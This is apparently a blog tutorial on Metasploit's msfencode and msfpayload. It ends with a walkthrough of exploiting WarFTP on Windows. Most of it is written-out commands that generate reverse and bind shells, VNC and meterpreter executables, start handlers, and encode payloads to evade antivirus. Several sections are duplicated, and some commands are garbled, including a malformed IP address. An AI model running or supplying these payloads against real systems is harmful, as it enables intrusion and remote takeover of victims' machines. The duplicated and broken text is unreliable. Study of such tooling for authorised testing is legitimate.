>. Definition Msfencode.
To address this problem, Metasploit’s developers offer msfencode, which helps
you to avoid bad characters and evade antivirus and IDSs by encoding the
original payload in a way that does not include “bad” characters. Enter
msfencode -h to see a list of msfencode options.
Metasploit contains a number of different encoders for specific situations.
Some will be useful when you can use only alphanumeric characters as part
of a payload, as is the case with many file format exploits or other applications
that accept only printable characters as input, while others are great general
purpose encoders that do well in every situation.
When in doubt, though, you really can’t go wrong with the x86/shikata_
ga_nai encoder, the only encoder with the rank of Excellent, a measure of
the reliability and stability of a module. In the context of an encoder, an
Excellent ranking implies that it is one of the most versatile encoders and
can accommodate a greater degree of fine-tuning than other encoders. To
see the list of encoders available, append -l to msfencode as shown next. The
payloads are ranked in order of reliability.
esample from encoder :
1. sikata_ga_nai
2. pex
3. Alpha2
4. none
But in Implematasi encoder I am using sikata_ga_nai.
>. Definition MsfPayload
The msfpayload component of Metasploit allows you to generate shellcode,
executables, and much more for use in exploits outside of the Framework.
Shellcode can be generated in many formats including C, Ruby, JavaScript,
and even Visual Basic for Applications. Each output format will be useful in
various situations. For example, if you are working with a Python-based proof
of concept, C-style output might be best; if you are working on a browser
exploit, a JavaScript output format might be best. After you have your desired
output, you can easily insert the payload directly into an HTML file to trigger
the exploit.
Metasploit Basics 13
To see which options the utility takes, enter msfpayload -h at the command
line, as shown here:
root@bt:/# msfpayload -h
As with msfcli, if you find yourself stuck on the required options for a payload
module, append the letter O on the command line for a list of required
and optional variables, like so:
root@bt:/# msfpayload windows/shell_reverse_tcp O
We will dive much deeper into msfpayload as we explore exploit development
in later chapters
Example fro Msfpayload :
1. For a listening shell on the target
Create payload:
./msfpayload windows/shell_bind_tcp LPORT=2482 X > /tmp/Listen-shell.exe
2. For a reverse shell on the target
Create payload:
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.112 X > /tmp/reverse-shell.exe
Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.112 E
Target:
run reverse-shell.exe
3. For a VNC listener on target
Create payload:
./msfpayload windows/vncinject/bind_tcp LPORT=2482 X > Listen-vnc.exe
Target:
run Listen-vnc.exe
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=2482 RHOST=192.168.1.110 DisableCourtesyShell=TRUE E
4. For a reverse VNC session
Create payload:
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 X > /tmp/reverse-vnc.exe
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 DisableCourtesyShell=TRUE E
Target:
run reverse-vnc.exe
5. For a meterpreter listener
create payload:
./msfpayload windows/meterpreter/bind_tcp LPORT=2482 X > met-listen.exe
Target:
run met-listen.exe
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.1.110 LPORT=2482 E
6. For a reverse meterpreter connection (not working yet. not sure why)
Create payload:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.112 X > /tmp/met-reverse.exe
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.112 E
Target:
run reverse-vnc.exe
5. For a meterpreter listener
create payload:
./msfpayload windows/meterpreter/bind_tcp LPORT=2482 X > met-listen.exe
Target:
run met-listen.exe
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.1.110 LPORT=2482 E
6. For a reverse meterpreter connection (not working yet. not sure why)
Create payload:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.112 X > /tmp/met-reverse.exe
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.112 E
In Implematation I am Using payload windows/meterpreter_reverse_tcp
>. Implemation Msfencode and MsfPayload
Oke we can try with exploit warftp in windows using Msfencode and Msfpayload.
Oke we can try with exploit warftp in windows using Msfencode and Msfpayload.
Result from command Msfconsole
we check warftp can using.
I using exploit windows/ftp/warftp_165_user
Next Set RHOST target for example IP in my windows 192.168.43.128
Next Set LHOST us IP for example 192.168.43.1
Next before we are using payload we show all payload with command Show options.
Next choise payload from show options for example we are using set PAYLOAD windows/meterpreter/reverse_tcp
Next we show options for check from all command in the top.
we show target
Next we choise 3 and next exploit.
Next make encode
Next Upload encode file to windows target
Next Chek file have send with encode file
Next check port encode we have send to windows whit command nc -l -v -p 31337
Next press Enter and success file encode we have send
GOOD LUCK TRYING.
Tidak ada komentar:
Posting Komentar